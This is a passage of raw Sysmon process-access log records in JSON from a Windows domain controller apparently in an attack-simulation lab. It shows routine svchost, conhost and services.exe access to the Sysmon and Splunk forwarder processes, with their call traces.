06:49:16.240","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1655,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.240\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.240","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1656,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.240\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.240","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1657,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.240\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.240","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1658,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.240\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.240","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1659,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.240\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.240","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1660,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.240\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.240","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1661,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.240\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010545C0300}\r\nSourceProcessId: 3752\r\nSourceThreadId: 3772\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-0010735D0300}\r\nTargetProcessId: 3788\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.240","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010545C0300}","SourceProcessId":"3752","SourceThreadId":"3772","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010735D0300}","TargetProcessId":"3788","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1662,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.255\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 940\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nTargetProcessId: 2792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.255","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"940","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","TargetProcessId":"2792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 